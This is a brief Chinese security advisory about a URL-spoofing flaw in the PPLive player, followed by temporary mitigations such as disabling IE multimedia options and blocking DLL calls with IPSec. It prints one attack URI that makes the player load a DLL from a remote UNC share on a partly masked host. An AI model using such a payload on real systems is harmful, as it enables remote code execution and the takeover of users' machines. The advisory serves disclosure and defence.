第一漏洞

tony50917

PPLIVE URL欺骗
漏洞描述：PPLIVE近期被外国黑客公布了针对URL地址欺骗的攻击代码，导致国内出现大量针对此漏洞的钓鱼攻击，攻击者可远程利用如下代码欺骗用户调用DLL文件远程执行代码：“PPOD://WWW.EXA***.COM?％20/LOADMODULE％20\\EXA***.COM\UNC_SHARE\SH.D11％20”导致用户计算机成为“僵尸肉鸡”。
临时解决方案：
1、依次打开IE的“工具→INTERNET选项→高级→多媒体”，取消对“在网页中播放动画”、“在网页中播放声音”的勾选，然后单击“确定”。
2、不随意安装PPLIVE的非官方插件，国内的攻击方式多为构造PPLIVE插件进行攻击。
3、利用IPSEC禁止调用DLL类文件。

烟烟